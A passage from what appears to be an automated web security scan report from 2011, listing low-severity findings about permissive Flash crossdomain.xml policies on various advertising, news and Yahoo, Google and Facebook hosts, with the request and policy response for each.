Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:51 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

3.47. http://ads.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:16:07 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

3.48. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 07 Sep 2011 14:18:57 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Wed, 07 Sep 2011 14:21:17 +0000 GMT
Etag: 336a6454235e3e8eb7a514ed6046bb68
X-Served-By: vanga

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

3.49. http://au.adserver.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://au.adserver.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: au.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 01 Sep 2011 16:38:40 GMT
Accept-Ranges: bytes
Content-Length: 2190
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="www.comcast.net" />
<allow-access-from domain="dpbaseball.comcast.net" />
<allow-access-from domain="fantasysports.comcast.net" />
<allow-access-from domain="finance.comcast.net" />
<allow-access-from domain="horoscope.comcast.net" />
<allow-access-from domain="sz0005.wc.mail.comcast.net" />
<allow-access-from domain="games.comcast.net" />
<allow-access-from domain="community.comcast.net" />
<allow-access-from domain="player.sambatech.com.br" />
<allow-access-from domain="*.zope.net" />
<allow-access-from domain="*muzu.tv" />
<allow-access-from domain="*movieclips.com" />
<allow-access-from domain="*.adap.tv" />
<allow-access-from domain="*.viki.com" />
<allow-access-from domain="*.vikistaging.net" />
<allow-access-from domain="vikiplayerdemo.heroku.com" />
<allow-access-from domain="*.btrll.com" />
<allow-access-from domain="cdn.visiblemeasures.com" />
...[SNIP]...

3.50. http://au.news.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://au.news.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: au.news.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:37 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 10 Mar 2010 23:40:51 GMT
Accept-Ranges: bytes
Content-Length: 983
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.51. http://au.pfinance.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://au.pfinance.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: au.pfinance.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 10 Mar 2010 23:40:51 GMT
Accept-Ranges: bytes
Content-Length: 983
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.52. http://cm.au.thewest.overture.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.au.thewest.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.au.thewest.overture.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

3.53. http://cookex.amp.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.54. http://courses.mycareer.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://courses.mycareer.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: courses.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_education_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Date: Wed, 07 Sep 2011 14:18:07 GMT
Content-Type: text/xml
Last-Modified: Tue, 17 May 2011 03:48:20 GMT
Connection: keep-alive
Expires: Fri, 07 Oct 2011 14:18:07 GMT
Cache-Control: max-age=2592000
Content-Length: 407

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s0.2mdn.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="addemo.f2.com.au" secure="true" to-ports="*"/>
...[SNIP]...

3.55. http://feeds.mycareer.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.mycareer.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=10800
Content-Length: 392
Content-Type: text/xml
Content-Location: http://feeds.mycareer.com.au/crossdomain.xml
Last-Modified: Fri, 26 Aug 2011 04:55:30 GMT
Accept-Ranges: bytes
ETag: "0cd261ac63cc1:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:17:25 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s0.2mdn.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="addemo.f2.com.au" secure="true" to-ports="*"/>
...[SNIP]...

3.56. http://media.perthnow.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.perthnow.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.perthnow.com.au

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "0331dfe0f891a41f0980259a1864f506:1271030068"
Last-Modified: Sun, 11 Apr 2010 23:54:28 GMT
Accept-Ranges: bytes
Content-Length: 1823
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*.news.com.au"/>
   <allow-access-from domain="*.foxsports.com.au"/>
   <allow-access-from domain="*.perthnow.com.au"/>
   <allow-access-from domain="*.theaustralian.com.au"/>
   <allow-access-from domain="*.dailytelegraph.com.au"/>
   <allow-access-from domain="*.heraldsun.com.au"/>
   <allow-access-from domain="*.couriermail.com.au"/>
   <allow-access-from domain="*.adelaidenow.com.au"/>
   <allow-access-from domain="*.themercury.com.au"/>
   <allow-access-from domain="*.ntnews.com.au"/>
   <allow-access-from domain="*.roo.com"/>
   <allow-access-from domain="*.carsguide.com.au"/>
   <allow-access-from domain="*.tiser.com.au"/>
   <allow-access-from domain="*.vogue.com.au"/>
   <allow-access-from domain="*.newsdigitalmedia.com.au"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="67.228.97.188/flashcms"/>
   <allow-access-from domain="208.43.130.232/flashcms"/>

   <allow-access-from domain="pst-pndev.*" />
   <allow-access-from domain="online.wsj.com" />
   
   <allow-access-from domain="*.nova1069.com.au"/>
   <allow-access-from domain="*.nova937.com.au" />
   <allow-access-from domain="*.nova1069.com.au"/>
   <allow-access-from domain="*.nova969.com.au"/>
   <allow-access-from domain="*.nova100.com.au"/>
   <allow-access-from domain="*.nova919.com.au"/>
   <allow-access-from domain="*.pickyanova.com.au"/>
   <allow-access-from domain="*.novafm.com.au"/>
   
   <allow-access-from domain="*.studentedge.com.au"/>
...[SNIP]...

3.57. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:10 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.58. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 18:56:53 GMT
Expires: Wed, 07 Sep 2011 18:56:53 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69455

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.59. http://pluck.abc.net.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pluck.abc.net.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pluck.abc.net.au

Response

HTTP/1.0 200 OK
Content-Length: 217
Content-Type: text/xml
Content-Location: http://pluck.abc.net.au/crossdomain.xml
Last-Modified: Mon, 22 Aug 2011 09:40:53 GMT
Accept-Ranges: bytes
ETag: "538de96af60cc1:1c8a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Wed, 07 Sep 2011 14:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="abc.net.au"/>
<allow-access-from domain="*.abc.net.au"/>
<allow-access-from domain="abc.com.au"/>
<allow-access-from domain="*.abc.com.au"/>
</cro
...[SNIP]...

3.60. http://resources.news.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://resources.news.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: resources.news.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 25 May 2011 00:05:10 GMT
ETag: "f1f565-4c5-4a40e7538d980"
Content-Type: text/xml
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=900
Expires: Wed, 07 Sep 2011 14:30:05 GMT
Date: Wed, 07 Sep 2011 14:15:05 GMT
Content-Length: 1221
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.news.com.au" />
   <allow-access-from domain="*.foxsports.com.au" />
   <allow-access-from domain="*.perthnow.com.au" />
   <allow-access-from domain="*.theaustralian.com.au" />
   <allow-access-from domain="*.dailytelegraph.com.au" />
   <allow-access-from domain="*.heraldsun.com.au" />
   <allow-access-from domain="*.couriermail.com.au" />
   <allow-access-from domain="*.adelaidenow.com.au" />
   <allow-access-from domain="*.themercury.com.au" />
   <allow-access-from domain="*.ntnews.com.au" />
   <allow-access-from domain="*.roo.com" />
   <allow-access-from domain="*.carsguide.com.au" />
   <allow-access-from domain="*.tiser.com.au" />
   <allow-access-from domain="*.vogue.com.au" />
   <allow-access-from domain="*.newsdigitalmedia.com.au" />
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.google.com"/>
...[SNIP]...

3.61. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.198
X-Cnection: close
Date: Wed, 07 Sep 2011 14:18:19 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
